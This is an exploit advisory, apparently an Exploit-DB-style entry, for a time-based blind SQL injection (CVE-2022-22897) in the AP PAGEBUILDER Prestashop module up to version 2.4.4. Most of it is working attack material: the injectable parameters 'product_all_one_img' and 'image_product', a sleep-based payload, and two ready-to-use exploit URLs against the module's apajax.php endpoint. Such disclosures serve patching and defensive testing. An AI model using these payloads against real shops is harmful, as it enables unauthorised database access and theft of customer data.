# Exploit Title:  AP PAGEBUILDER Prestashop module <= 2.4.4 'product_all_one_img' , 'image_product' Blind SQL Injection
# Date: 24-08-2022
# Exploit Author: Mohamed Ali Hammami
# Vendor Homepage: https://apollotheme.com/
#Software Link : https://apollotheme.com/products/ap-pagebuilder-prestashop-module
# Version: 2.4.4
# Tested on: Windows 10
#CVE: CVE-2022-22897

Parameters: product_all_one_img,image_product

Payload: 1) or sleep(4) #

Exploit:
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1)+or+sleep(4)%23&image_product=0&wishlist_compare=1
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1&image_product=1)+or+sleep(4)%23&wishlist_compare=1